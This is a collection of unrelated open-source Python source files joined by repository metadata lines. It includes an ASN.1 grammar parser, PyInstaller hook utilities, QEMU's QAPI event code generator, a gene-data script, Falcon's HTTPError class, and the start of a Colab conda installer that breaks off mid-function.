'partial_specification : LBRACE ELLIPSIS COMMA type_constraints RBRACE'
t[0] = t[4]
def p_type_constraints_1 (t):
'type_constraints : named_constraint'
t [0] = [t[1]]
def p_type_constraints_2 (t):
'type_constraints : type_constraints COMMA named_constraint'
t[0] = t[1] + [t[3]]
def p_named_constraint_1 (t):
'named_constraint : identifier constraint'
return Node ('named_constraint', ident = t[1], constr = t[2])
def p_named_constraint_2 (t):
'named_constraint : constraint'
return Node ('named_constraint', constr = t[1])
def p_constraint (t):
'constraint : value_constraint presence_constraint'
t[0] = Node ('constraint', value = t[1], presence = t[2])
def p_value_constraint_1 (t):
'value_constraint : subtype_spec'
t[0] = t[1]
def p_value_constraint_2 (t):
'value_constraint : '
pass
def p_presence_constraint_1 (t):
'''presence_constraint : PRESENT
| ABSENT
| OPTIONAL'''
t[0] = t[1]
def p_presence_constraint_2 (t):
'''presence_constraint : '''
pass
# /*-----------------------------------------------------------------------*/
# /* Value Notation Productions */
# /*-----------------------------------------------------------------------*/
def p_value_assign (t):
'value_assign : identifier type GETS value'
return Node ('value_assign', ident = t[1], typ = t[2], val = t[4])
def p_value (t):
'''value : builtin_value
| defined_value'''
t[0] = t[1]
def p_defined_value(t):
'''defined_value : ext_val_ref
| identifier'''
t[0] = t[1]
def p_ext_val_ref (t):
'ext_val_ref : type_ref DOT identifier'
# XXX coerce type_ref to module_ref
return Node ('ext_val_ref', module = t[1], ident = t[3])
def p_builtin_value_1 (t):
'''builtin_value : boolean_val
| null_val
| special_real_val
| signed_number
| hex_string
| binary_string
| char_string''' # XXX we don't support {data} here
t[0] = t[1]
def p_boolean_val (t):
'''boolean_val : TRUE
| FALSE'''
t[0] = t[1]
def p_special_real_val (t):
'''special_real_val : PLUS_INFINITY
| MINUS_INFINITY'''
t[0] = t[1]
def p_null_val (t):
'null_val : NULL'
t[0] = t[1]
def p_named_value_1 (t):
'named_value : value'
t[0] = t[1]
def p_named_value_2 (t):
'named_value : identifier value'
t[0] = Node ('named_value', ident = t[1], value = t[2])
def p_oid_val (t):
'oid_val : LBRACE oid_comp_list RBRACE'
t[0] = t[2]
def p_oid_comp_list_1 (t):
'oid_comp_list : oid_comp_list oid_component'
t[0] = t[1] + [t[2]]
def p_oid_comp_list_2 (t):
'oid_comp_list : oid_component'
t[0] = [t[1]]
def p_oid_component (t):
'''oid_component : number_form
| name_form
| name_and_number_form'''
t[0] = t[1]
def p_number_form (t):
'number_form : NUMBER'
t [0] = t[1]
# Note that Z39.50 v3 spec has upper-case here for, e.g., SUTRS.
# I've hacked the grammar to be liberal about what it accepts.
# XXX should have -strict command-line flag to only accept lowercase
# here, since that's what X.208 says.
# XXX I've switched back, because this creates a shift/reduce conflict
# which causes PLY 1.2 and 1.3 to blow up: cope and hack your input files,
# or persuade ITU/ISO/whoever to provide correct specs.
def p_name_form (t):
'''name_form : type_ref'''
t[0] = t[1]
def p_name_and_number_form_1 (t):
'''name_and_number_form : identifier LPAREN number_form RPAREN
| type_ref LPAREN number_form RPAREN'''
t[0] = Node ('name_and_number', ident = t[1], number = t[3])
def p_name_and_number_form_2 (t):
'name_and_number_form : identifier LPAREN defined_value RPAREN'
t[0] = Node ('name_and_number', ident = t[1], val = t[3])
# see X.208 if you're dubious about lcase only for identifier
def p_identifier (t):
'identifier : LCASE_IDENT'
t[0] = t[1]
def p_binary_string (t):
'binary_string : BSTRING'
t[0] = t[1]
def p_hex_string (t):
'hex_string : HSTRING'
t[0] = t[1]
def p_char_string (t):
'char_string : QSTRING'
t[0] = t[1]
def p_number (t):
'number : NUMBER'
t[0] = t[1]
def p_type_ref (t):
'type_ref : UCASE_IDENT'
t[0] = Type_Ref (name=t[1])
def p_error(t):
raise ParseError (str(t))
yacc.yacc ()
# XXX should just calculate dependencies as we go along. Should be part of prepass, not
# a utility function all back-ends have to call.
def calc_dependencies (node, dict, trace = 0):
if not hasattr (node, '__dict__'):
if trace: print "#returning, node=", node
return
if node.type == 'Type_Ref': # XXX
dict [node.name] = 1
if trace: print "#Setting", node.name
return
for (a, val) in node.__dict__.items ():
if trace: print "# Testing node ", node, "attr", a, " val", val
if a[0] == '_':
continue
elif isinstance (val, type ([])):
for v in val:
calc_dependencies (v, dict, trace)
elif isinstance (val, Node):
calc_dependencies (val, dict, trace)
def testlex (s, fn, dict):
lexer.input (s)
while 1:
token = lexer.token ()
if not token:
break
print token
import sys
if __name__ == '__main__':
defined_dict = {}
for fn in sys.argv [1:]:
f = open (fn, "r")
ast = yacc.parse (f.read())
print map (str, ast)
lexer.lineno = 1
|
seblefevre/testerman
|
plugins/codecs/ber/compiler.py
|
Python
|
gpl-2.0
| 29,456
|
[
"ASE"
] |
bfd9c6f515bd4c21a89617fe85f19a69d3b92a785c2d8896c90caef9a5c4f5a6
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
import glob
import os
import sys
import PyInstaller
import PyInstaller.compat as compat
from PyInstaller.compat import is_darwin
from PyInstaller.utils import misc
import PyInstaller.log as logging
logger = logging.getLogger(__name__)
def __exec_python_cmd(cmd):
"""
Executes an externally spawned Python interpreter and returns
anything that was emitted in the standard output as a single
string.
"""
# Prepend PYTHONPATH with pathex
pp = os.pathsep.join(PyInstaller.__pathex__)
old_pp = compat.getenv('PYTHONPATH')
if old_pp:
pp = os.pathsep.join([old_pp, pp])
compat.setenv("PYTHONPATH", pp)
try:
try:
txt = compat.exec_python(*cmd)
except OSError, e:
raise SystemExit("Execution failed: %s" % e)
finally:
if old_pp is not None:
compat.setenv("PYTHONPATH", old_pp)
else:
compat.unsetenv("PYTHONPATH")
return txt.strip()
def exec_statement(statement):
"""Executes a Python statement in an externally spawned interpreter, and
returns anything that was emitted in the standard output as a single string.
"""
cmd = ['-c', statement]
return __exec_python_cmd(cmd)
def exec_script(script_filename, *args):
"""
Executes a Python script in an externally spawned interpreter, and
returns anything that was emitted in the standard output as a
single string.
To prevent missuse, the script passed to hookutils.exec-script
must be located in the `hooks/utils` directory.
"""
script_filename = os.path.join('utils', os.path.basename(script_filename))
script_filename = os.path.join(os.path.dirname(__file__), script_filename)
if not os.path.exists(script_filename):
raise SystemError("To prevent missuse, the script passed to "
"hookutils.exec-script must be located in "
"the `hooks/utils` directory.")
# Scripts might be importing some modules. Add PyInstaller code to pathex.
pyinstaller_root_dir = os.path.dirname(os.path.abspath(PyInstaller.__path__[0]))
PyInstaller.__pathex__.append(pyinstaller_root_dir)
cmd = [script_filename]
cmd.extend(args)
return __exec_python_cmd(cmd)
def eval_statement(statement):
txt = exec_statement(statement).strip()
if not txt:
# return an empty string which is "not true" but iterable
return ''
return eval(txt)
def eval_script(scriptfilename, *args):
txt = exec_script(scriptfilename, *args).strip()
if not txt:
# return an empty string which is "not true" but iterable
return ''
return eval(txt)
def get_pyextension_imports(modname):
"""
Return list of modules required by binary (C/C++) Python extension.
Python extension files ends with .so (Unix) or .pyd (Windows).
It's almost impossible to analyze binary extension and its dependencies.
Module cannot be imported directly.
Let's at least try import it in a subprocess and get the diffrence
in module list from sys.modules.
This function could be used for 'hiddenimports' in PyInstaller hooks files.
"""
statement = """
import sys
# Importing distutils filters common modules, especiall in virtualenv.
import distutils
original_modlist = sys.modules.keys()
# When importing this module - sys.modules gets updated.
import %(modname)s
all_modlist = sys.modules.keys()
diff = set(all_modlist) - set(original_modlist)
# Module list contain original modname. We do not need it there.
diff.discard('%(modname)s')
# Print module list to stdout.
print list(diff)
""" % {'modname': modname}
module_imports = eval_statement(statement)
if not module_imports:
logger.error('Cannot find imports for module %s' % modname)
return [] # Means no imports found or looking for imports failed.
#module_imports = filter(lambda x: not x.startswith('distutils'), module_imports)
return module_imports
def qt4_plugins_dir():
qt4_plugin_dirs = eval_statement(
"from PyQt4.QtCore import QCoreApplication;"
"app=QCoreApplication([]);"
"print map(unicode,app.libraryPaths())")
if not qt4_plugin_dirs:
logger.error("Cannot find PyQt4 plugin directories")
return ""
for d in qt4_plugin_dirs:
if os.path.isdir(d):
return str(d) # must be 8-bit chars for one-file builds
logger.error("Cannot find existing PyQt4 plugin directory")
return ""
def qt4_phonon_plugins_dir():
qt4_plugin_dirs = eval_statement(
"from PyQt4.QtGui import QApplication;"
"app=QApplication([]); app.setApplicationName('pyinstaller');"
"from PyQt4.phonon import Phonon;"
"v=Phonon.VideoPlayer(Phonon.VideoCategory);"
"print map(unicode,app.libraryPaths())")
if not qt4_plugin_dirs:
logger.error("Cannot find PyQt4 phonon plugin directories")
return ""
for d in qt4_plugin_dirs:
if os.path.isdir(d):
return str(d) # must be 8-bit chars for one-file builds
logger.error("Cannot find existing PyQt4 phonon plugin directory")
return ""
def qt4_plugins_binaries(plugin_type):
"""Return list of dynamic libraries formated for mod.binaries."""
binaries = []
pdir = qt4_plugins_dir()
files = misc.dlls_in_dir(os.path.join(pdir, plugin_type))
for f in files:
binaries.append((
os.path.join('qt4_plugins', plugin_type, os.path.basename(f)),
f, 'BINARY'))
return binaries
def qt4_menu_nib_dir():
"""Return path to Qt resource dir qt_menu.nib."""
menu_dir = ''
# Detect MacPorts prefix (usually /opt/local).
# Suppose that PyInstaller is using python from macports.
macports_prefix = sys.executable.split('/Library')[0]
# list of directories where to look for qt_menu.nib
dirs = [
# Qt4 from MacPorts not compiled as framework.
os.path.join(macports_prefix, 'lib', 'Resources'),
# Qt4 from MacPorts compiled as framework.
os.path.join(macports_prefix, 'libexec', 'qt4-mac', 'lib',
'QtGui.framework', 'Versions', '4', 'Resources'),
# Qt4 installed into default location.
'/Library/Frameworks/QtGui.framework/Resources',
'/Library/Frameworks/QtGui.framework/Versions/4/Resources',
'/Library/Frameworks/QtGui.Framework/Versions/Current/Resources',
]
# Qt4 from Homebrew compiled as framework
globpath = '/usr/local/Cellar/qt/4.*/lib/QtGui.framework/Versions/4/Resources'
qt_homebrew_dirs = glob.glob(globpath)
dirs += qt_homebrew_dirs
# Check directory existence
for d in dirs:
d = os.path.join(d, 'qt_menu.nib')
if os.path.exists(d):
menu_dir = d
break
if not menu_dir:
logger.error('Cannont find qt_menu.nib directory')
return menu_dir
def django_dottedstring_imports(django_root_dir):
"""
Get all the necessary Django modules specified in settings.py.
In the settings.py the modules are specified in several variables
as strings.
"""
package_name = os.path.basename(django_root_dir)
compat.setenv('DJANGO_SETTINGS_MODULE', '%s.settings' % package_name)
# Extend PYTHONPATH with parent dir of django_root_dir.
PyInstaller.__pathex__.append(misc.get_path_to_toplevel_modules(django_root_dir))
# Extend PYTHONPATH with django_root_dir.
# Many times Django users do not specify absolute imports in the settings module.
PyInstaller.__pathex__.append(django_root_dir)
ret = eval_script('django-import-finder.py')
# Unset environment variables again.
compat.unsetenv('DJANGO_SETTINGS_MODULE')
return ret
def django_find_root_dir():
"""
Return path to directory (top-level Python package) that contains main django
files. Return None if no directory was detected.
Main Django project directory contain files like '__init__.py', 'settings.py'
and 'url.py'.
In Django 1.4+ the script 'manage.py' is not in the directory with 'settings.py'
but usually one level up. We need to detect this special case too.
"""
# Get the directory with manage.py. Manage.py is supplied to PyInstaller as the
# first main executable script.
manage_py = sys._PYI_SETTINGS['scripts'][0]
manage_dir = os.path.dirname(os.path.abspath(manage_py))
# Get the Django root directory. The directory that contains settings.py and url.py.
# It could be the directory containig manage.py or any of its subdirectories.
settings_dir = None
files = set(os.listdir(manage_dir))
if 'settings.py' in files and 'urls.py' in files:
settings_dir = manage_dir
else:
for f in files:
if os.path.isdir(f):
subfiles = os.listdir(os.path.join(manage_dir, f))
# Subdirectory contains critical files.
if 'settings.py' in subfiles and 'urls.py' in subfiles:
settings_dir = os.path.join(manage_dir, f)
break # Find the first directory.
return settings_dir
def matplotlib_backends():
"""
Return matplotlib backends availabe in current Python installation.
All matplotlib backends are hardcoded. We have to try import them
and return the list of successfully imported backends.
"""
all_bk = eval_statement('import matplotlib; print matplotlib.rcsetup.all_backends')
avail_bk = []
import_statement = """
try:
__import__('matplotlib.backends.backend_%s')
except ImportError, e:
print str(e)
"""
# CocoaAgg backend causes subprocess to exit and thus detection
# is not reliable. This backend is meaningful only on Mac OS X.
if not is_darwin and 'CocoaAgg' in all_bk:
all_bk.remove('CocoaAgg')
# Try to import every backend in a subprocess.
for bk in all_bk:
stdout = exec_statement(import_statement % bk.lower())
# Backend import is successfull if there is no text in stdout.
if not stdout:
avail_bk.append(bk)
# Convert backend name to module name.
# e.g. GTKAgg -> backend_gtkagg
return ['backend_' + x.lower() for x in avail_bk]
def opengl_arrays_modules():
"""
Return list of array modules for OpenGL module.
e.g. 'OpenGL.arrays.vbo'
"""
statement = 'import OpenGL; print OpenGL.__path__[0]'
opengl_mod_path = PyInstaller.hooks.hookutils.exec_statement(statement)
arrays_mod_path = os.path.join(opengl_mod_path, 'arrays')
files = glob.glob(arrays_mod_path + '/*.py')
modules = []
for f in files:
mod = os.path.splitext(os.path.basename(f))[0]
# Skip __init__ module.
if mod == '__init__':
continue
modules.append('OpenGL.arrays.' + mod)
return modules
def remove_prefix(string, prefix):
"""
This funtion removes the given prefix from a string, if the string does
indeed begin with the prefix; otherwise, it returns the string
unmodified.
"""
if string.startswith(prefix):
return string[len(prefix):]
else:
return string
def remove_suffix(string, suffix):
"""
This funtion removes the given suffix from a string, if the string
does indeed end with the prefix; otherwise, it returns the string
unmodified.
"""
# Special case: if suffix is empty, string[:0] returns ''. So, test
# for a non-empty suffix.
if suffix and string.endswith(suffix):
return string[:-len(suffix)]
else:
return string
def remove_file_extension(filename):
"""
This funtion returns filename without its extension.
"""
return os.path.splitext(filename)[0]
def get_module_file_attribute(package):
"""
Given a pacage name, return the value of __file__ attribute.
In PyInstaller process we cannot import directly analyzed modules.
"""
# Statement to return __file__ attribute of a package.
__file__statement = """
# Fun Python behavior: __import__('mod.submod') returns mod,
# where as __import__('mod.submod', fromlist = [a non-empty list])
# returns mod.submod. See the docs on `__import__
# <http://docs.python.org/library/functions.html#__import__>`_.
# Keyworded arguments in __import__ function are available
# in Python 2.5+. Compatibility with Python 2.4 is preserved.
_fromlist = ['']
_globals = {}
_locals = {}
package = __import__('%s', _globals, _locals, _fromlist)
print package.__file__
"""
return exec_statement(__file__statement % package)
def get_package_paths(package):
"""
Given a package, return the path to packages stored on this machine
and also returns the path to this particular package. For example,
if pkg.subpkg lives in /abs/path/to/python/libs, then this function
returns (/abs/path/to/python/libs,
/abs/path/to/python/libs/pkg/subpkg).
"""
# A package must have a path -- check for this, in case the package
# parameter is actually a module.
is_pkg_statement = 'import %s as p; print hasattr(p, "__path__")'
is_package = eval_statement(is_pkg_statement % package)
assert is_package
file_attr = get_module_file_attribute(package)
# package.__file__ = /abs/path/to/package/subpackage/__init__.py.
# Search for Python files in /abs/path/to/package/subpackage; pkg_dir
# stores this path.
pkg_dir = os.path.dirname(file_attr)
# When found, remove /abs/path/to/ from the filename; mod_base stores
# this path to be removed.
pkg_base = remove_suffix(pkg_dir, package.replace('.', os.sep))
return pkg_base, pkg_dir
# All these extension represent Python modules or extension modules
PY_EXECUTABLE_EXTENSIONS = set(['.py', '.pyc', '.pyd', '.pyo', '.so'])
def collect_submodules(package):
"""
The following two functions were originally written by Ryan Welsh
(welchr AT umich.edu).
This produces a list of strings which specify all the modules in
package. Its results can be directly assigned to ``hiddenimports``
in a hook script; see, for example, hook-sphinx.py. The
package parameter must be a string which names the package.
This function does not work on zipped Python eggs.
This function is used only for hook scripts, but not by the body of
PyInstaller.
"""
pkg_base, pkg_dir = get_package_paths(package)
# Walk through all file in the given package, looking for submodules.
mods = set()
for dirpath, dirnames, filenames in os.walk(pkg_dir):
# Change from OS separators to a dotted Python module path,
# removing the path up to the package's name. For example,
# '/abs/path/to/desired_package/sub_package' becomes
# 'desired_package.sub_package'
mod_path = remove_prefix(dirpath, pkg_base).replace(os.sep, ".")
# If this subdirectory is a package, add it and all other .py
# files in this subdirectory to the list of modules.
if '__init__.py' in filenames:
mods.add(mod_path)
for f in filenames:
extension = os.path.splitext(f)[1]
if ((remove_file_extension(f) != '__init__') and
extension in PY_EXECUTABLE_EXTENSIONS):
mods.add(mod_path + "." + remove_file_extension(f))
else:
# If not, nothing here is part of the package; don't visit any of
# these subdirs.
del dirnames[:]
return list(mods)
# These extensions represent Python executables and should therefore be
# ignored.
PY_IGNORE_EXTENSIONS = set(['.py', '.pyc', '.pyd', '.pyo', '.so', 'dylib'])
def collect_data_files(package):
"""
This routine produces a list of (source, dest) non-Python (i.e. data)
files which reside in package. Its results can be directly assigned to
``datas`` in a hook script; see, for example, hook-sphinx.py. The
package parameter must be a string which names the package.
This function does not work on zipped Python eggs.
This function is used only for hook scripts, but not by the body of
PyInstaller.
"""
pkg_base, pkg_dir = get_package_paths(package)
# Walk through all file in the given package, looking for data files.
datas = []
for dirpath, dirnames, files in os.walk(pkg_dir):
for f in files:
extension = os.path.splitext(f)[1]
if not extension in PY_IGNORE_EXTENSIONS:
# Produce the tuple
# (/abs/path/to/source/mod/submod/file.dat,
# mod/submod/file.dat)
source = os.path.join(dirpath, f)
dest = remove_prefix(dirpath,
os.path.dirname(pkg_base) + os.sep)
datas.append((source, dest))
return datas
|
TeamSWAP/swap
|
external/pyinstaller/PyInstaller/hooks/hookutils.py
|
Python
|
apache-2.0
| 17,250
|
[
"VisIt"
] |
9aa7aaf4dbf54f1a058131d8e9657b97c4d19f95d6760fe4600cb7867a3a746a
|
#
# QAPI event generator
#
# Copyright (c) 2014 Wenchao Xia
# Copyright (c) 2015-2016 Red Hat Inc.
#
# Authors:
# Wenchao Xia <wenchaoqemu@gmail.com>
# Markus Armbruster <armbru@redhat.com>
#
# This work is licensed under the terms of the GNU GPL, version 2.
# See the COPYING file in the top-level directory.
from qapi import *
def gen_event_send_proto(name, arg_type, boxed):
return 'void qapi_event_send_%(c_name)s(%(param)s)' % {
'c_name': c_name(name.lower()),
'param': gen_params(arg_type, boxed, 'Error **errp')}
def gen_event_send_decl(name, arg_type, boxed):
return mcgen('''
%(proto)s;
''',
proto=gen_event_send_proto(name, arg_type, boxed))
# Declare and initialize an object 'qapi' using parameters from gen_params()
def gen_param_var(typ):
assert not typ.variants
ret = mcgen('''
%(c_name)s param = {
''',
c_name=typ.c_name())
sep = ' '
for memb in typ.members:
ret += sep
sep = ', '
if memb.optional:
ret += 'has_' + c_name(memb.name) + sep
if memb.type.name == 'str':
# Cast away const added in gen_params()
ret += '(char *)'
ret += c_name(memb.name)
ret += mcgen('''
};
''')
if not typ.is_implicit():
ret += mcgen('''
%(c_name)s *arg = ¶m;
''',
c_name=typ.c_name())
return ret
def gen_event_send(name, arg_type, boxed):
# FIXME: Our declaration of local variables (and of 'errp' in the
# parameter list) can collide with exploded members of the event's
# data type passed in as parameters. If this collision ever hits in
# practice, we can rename our local variables with a leading _ prefix,
# or split the code into a wrapper function that creates a boxed
# 'param' object then calls another to do the real work.
ret = mcgen('''
%(proto)s
{
QDict *qmp;
Error *err = NULL;
QMPEventFuncEmit emit;
''',
proto=gen_event_send_proto(name, arg_type, boxed))
if arg_type and not arg_type.is_empty():
ret += mcgen('''
QObject *obj;
Visitor *v;
''')
if not boxed:
ret += gen_param_var(arg_type)
else:
assert not boxed
ret += mcgen('''
emit = qmp_event_get_func_emit();
if (!emit) {
return;
}
qmp = qmp_event_build_dict("%(name)s");
''',
name=name)
if arg_type and not arg_type.is_empty():
ret += mcgen('''
v = qobject_output_visitor_new(&obj);
''')
if not arg_type.is_implicit():
ret += mcgen('''
visit_type_%(c_name)s(v, "%(name)s", &arg, &err);
''',
name=name, c_name=arg_type.c_name())
else:
ret += mcgen('''
visit_start_struct(v, "%(name)s", NULL, 0, &err);
if (err) {
goto out;
}
visit_type_%(c_name)s_members(v, ¶m, &err);
if (!err) {
visit_check_struct(v, &err);
}
visit_end_struct(v, NULL);
''',
name=name, c_name=arg_type.c_name())
ret += mcgen('''
if (err) {
goto out;
}
visit_complete(v, &obj);
qdict_put_obj(qmp, "data", obj);
''')
ret += mcgen('''
emit(%(c_enum)s, qmp, &err);
''',
c_enum=c_enum_const(event_enum_name, name))
if arg_type and not arg_type.is_empty():
ret += mcgen('''
out:
visit_free(v);
''')
ret += mcgen('''
error_propagate(errp, err);
QDECREF(qmp);
}
''')
return ret
class QAPISchemaGenEventVisitor(QAPISchemaVisitor):
def __init__(self):
self.decl = None
self.defn = None
self._event_names = None
def visit_begin(self, schema):
self.decl = ''
self.defn = ''
self._event_names = []
def visit_end(self):
self.decl += gen_enum(event_enum_name, self._event_names)
self.defn += gen_enum_lookup(event_enum_name, self._event_names)
self._event_names = None
def visit_event(self, name, info, arg_type, boxed):
self.decl += gen_event_send_decl(name, arg_type, boxed)
self.defn += gen_event_send(name, arg_type, boxed)
self._event_names.append(name)
(input_file, output_dir, do_c, do_h, prefix, dummy) = parse_command_line()
c_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
h_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
(fdef, fdecl) = open_output(output_dir, do_c, do_h, prefix,
'qapi-event.c', 'qapi-event.h',
c_comment, h_comment)
fdef.write(mcgen('''
#include "qemu/osdep.h"
#include "qemu-common.h"
#include "%(prefix)sqapi-event.h"
#include "%(prefix)sqapi-visit.h"
#include "qapi/qobject-output-visitor.h"
#include "qapi/qmp-event.h"
''',
prefix=prefix))
fdecl.write(mcgen('''
#include "qapi/error.h"
#include "qapi/qmp/qdict.h"
#include "%(prefix)sqapi-types.h"
''',
prefix=prefix))
event_enum_name = c_name(prefix + "QAPIEvent", protect=False)
schema = QAPISchema(input_file)
gen = QAPISchemaGenEventVisitor()
schema.visit(gen)
fdef.write(gen.defn)
fdecl.write(gen.decl)
close_output(fdef, fdecl)
|
gongleiarei/qemu
|
scripts/qapi-event.py
|
Python
|
gpl-2.0
| 5,702
|
[
"VisIt"
] |
28a8edd81c74c2353c05d83f1641724fa8e059fe6bd47125a9bf710a96663015
|
import os
import numpy as np
from scipy.io import loadmat
from mindboggle.utils.io_vtk import read_vtk
from mindboggle.utils.compute import point_distance
G = loadmat('/Users/arno/Dropbox/MB/data/allen/H0351.2002.mat')
values = G['expr']
gene_mni = G['mni']
path = os.environ['MINDBOGGLE_DATA']
genes = []
gene_values = []
for i in range(25):
print(i)
input_vtk = os.path.join(path, 'allen', 'labels_traveldepth' + str(i) + '.vtk')
if os.path.exists(input_vtk):
faces, lines, indices, points, npoints, depths, name, input_vtk = read_vtk(input_vtk)
I = [i for i,x in enumerate(depths) if x>-1]
gene = 0
value = 0
print(len(I))
points2 = np.array(points)
points2 = points2[I]
for point in points2:
mind, minI = point_distance(point, gene_mni)
if np.max(values[minI]) > value:
gene = minI
value = np.max(values[minI])
genes.append(gene)
gene_values.append(value)
else:
genes.append(0)
gene_values.append(0)
|
binarybottle/mindboggle_sidelined
|
load_gene_data.py
|
Python
|
apache-2.0
| 1,078
|
[
"VTK"
] |
2ee5212d6bc70ef9f6305afc8e0e738240b7b0e8c33981fe459200ab55489a1a
|
# Copyright 2013 by Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import xml.etree.ElementTree as et
try: # pragma nocover
from collections import OrderedDict
except ImportError: # pragma nocover
OrderedDict = dict
from falcon.util import uri
class HTTPError(Exception):
"""Represents a generic HTTP error.
Raise this or a child class to have Falcon automagically return pretty
error responses (with an appropriate HTTP status code) to the client
when something goes wrong.
Attributes:
status (str): HTTP status line, e.g. '748 Confounded by Ponies'.
has_representation (bool): Read-only property that determines
whether error details will be serialized when composing
the HTTP response. In ``HTTPError`` this property always
returns ``True``, but child classes may override it
in order to return ``False`` when an empty HTTP body is desired.
See also the ``falcon.http_error.NoRepresentation`` mixin.
title (str): Error title to send to the client. Will be ``None`` if
the error should result in an HTTP response with an empty body.
description (str): Description of the error to send to the client.
headers (dict): Extra headers to add to the response.
link (str): An href that the client can provide to the user for
getting help.
code (int): An internal application code that a user can reference when
requesting support for the error.
Args:
status (str): HTTP status code and text, such as "400 Bad Request"
Keyword Args:
title (str): Human-friendly error title (default ``None``).
description (str): Human-friendly description of the error, along with
a helpful suggestion or two (default ``None``).
headers (dict or list): A ``dict`` of header names and values
to set, or a ``list`` of (*name*, *value*) tuples. Both *name* and
*value* must be of type ``str`` or ``StringType``, and only
character values 0x00 through 0xFF may be used on platforms that
use wide characters.
Note:
The Content-Type header, if present, will be overridden. If
you wish to return custom error messages, you can create
your own HTTP error class, and install an error handler
to convert it into an appropriate HTTP response for the
client
Note:
Falcon can process a list of ``tuple`` slightly faster
than a ``dict``.
headers (dict): Extra headers to return in the
response to the client (default ``None``).
href (str): A URL someone can visit to find out more information
(default ``None``). Unicode characters are percent-encoded.
href_text (str): If href is given, use this as the friendly
title/description for the link (defaults to "API documentation
for this error").
code (int): An internal code that customers can reference in their
support request or to help them when searching for knowledge
base articles related to this error (default ``None``).
"""
__slots__ = (
'status',
'title',
'description',
'headers',
'link',
'code',
)
def __init__(self, status, title=None, description=None, headers=None,
href=None, href_text=None, code=None):
self.status = status
self.title = title
self.description = description
self.headers = headers
self.code = code
if href:
link = self.link = OrderedDict()
link['text'] = (href_text or 'Documentation related to this error')
link['href'] = uri.encode(href)
link['rel'] = 'help'
else:
self.link = None
@property
def has_representation(self):
return True
def to_dict(self, obj_type=dict):
"""Returns a basic dictionary representing the error.
This method can be useful when serializing the error to hash-like
media types, such as YAML, JSON, and MessagePack.
Args:
obj_type: A dict-like type that will be used to store the
error information (default ``dict``).
Returns:
A dictionary populated with the error's title, description, etc.
"""
assert self.has_representation
obj = obj_type()
if self.title is not None:
obj['title'] = self.title
if self.description is not None:
obj['description'] = self.description
if self.code is not None:
obj['code'] = self.code
if self.link is not None:
obj['link'] = self.link
return obj
def to_json(self):
"""Returns a pretty-printed JSON representation of the error.
Returns:
A JSON document for the error.
"""
obj = self.to_dict(OrderedDict)
return json.dumps(obj, indent=4, separators=(',', ': '),
ensure_ascii=False)
def to_xml(self):
"""Returns an XML-encoded representation of the error.
Returns:
An XML document for the error.
"""
assert self.has_representation
error_element = et.Element('error')
if self.title is not None:
et.SubElement(error_element, 'title').text = self.title
if self.description is not None:
et.SubElement(error_element, 'description').text = self.description
if self.code is not None:
et.SubElement(error_element, 'code').text = str(self.code)
if self.link is not None:
link_element = et.SubElement(error_element, 'link')
for key in ('text', 'href', 'rel'):
et.SubElement(link_element, key).text = self.link[key]
return (b'<?xml version="1.0" encoding="UTF-8"?>' +
et.tostring(error_element, encoding='utf-8'))
class NoRepresentation(object):
"""Mixin for ``HTTPError`` child classes that have no representation.
This class can be mixed in when inheriting from ``HTTPError``, in order
to override the `has_representation` property such that it always
returns ``False``. This, in turn, will cause Falcon to return an empty
response body to the client.
You can use this mixin when defining errors that either should not have
a body (as dictated by HTTP standards or common practice), or in the
case that a detailed error response may leak information to an attacker.
Note:
This mixin class must appear before ``HTTPError`` in the base class
list when defining the child; otherwise, it will not override the
`has_representation` property as expected.
"""
@property
def has_representation(self):
return False
class OptionalRepresentation(object):
"""Mixin for ``HTTPError`` child classes that may have a representation.
This class can be mixed in when inheriting from ``HTTPError`` in order
to override the `has_representation` property, such that it will
return ``False`` when the error instance has no description
(i.e., the `description` kwarg was not set).
You can use this mixin when defining errors that do not include
a body in the HTTP response by default, serializing details only when
the web developer provides a description of the error.
Note:
This mixin class must appear before ``HTTPError`` in the base class
list when defining the child; otherwise, it will not override the
`has_representation` property as expected.
"""
@property
def has_representation(self):
return super(OptionalRepresentation, self).description is not None
|
cdepman/falcon_api
|
site-packages/falcon/http_error.py
|
Python
|
mit
| 8,482
|
[
"VisIt"
] |
ffe8363d604bb1c7658e66cb6c9f0a1701a90eec3d3c5c0c9b5b33b50b0ac378
|
"""
Original code by @philopon
https://gist.github.com/philopon/a75a33919d9ae41dbed5bc6a39f5ede2
"""
import sys
import os
import requests
import subprocess
import shutil
from logging import getLogger, StreamHandler, INFO
logger = getLogger(__name__)
logger.addHandler(StreamHandler())
logger.setLevel(INFO)
default_channels = [
"conda-forge",
]
default_packages = [
"openmm",
"pdbfixer",
]
def install(
chunk_size=4096,
file_name="Miniconda3-latest-Linux-x86_64.sh",
url_base="https://repo.continuum.io/miniconda/",
conda_path=os.path.expanduser(os.path.join("~", "miniconda")),
add_python_path=True,
# default channels are "conda-forge" and "omnia"
additional_channels=[],
# default packages are "rdkit", "openmm" and "pdbfixer"
additional_packages=[],
):
"""Install conda packages on Google Colab
For GPU/CPU notebook
```
import conda_installer
conda_installer.install()
```
If you want to add other packages, you can use additional_conda_channels and
additional_conda_package arguments. Please see the example.
```
import conda_installer
conda_installer.install(
additional_conda_channels=[]
additional_conda_packages=["mdtraj", "networkx"]
)
// add channel
import conda_installer
conda_installer.install(
additional_conda_channels=["dglteam"]
additional_conda_packages=["dgl-cuda10.1"]
)
```
"""
python_path = os.path.join(
conda_path,
"lib",
"python{0}.{1}".format(*sys.version_info),
"site-packages",
)
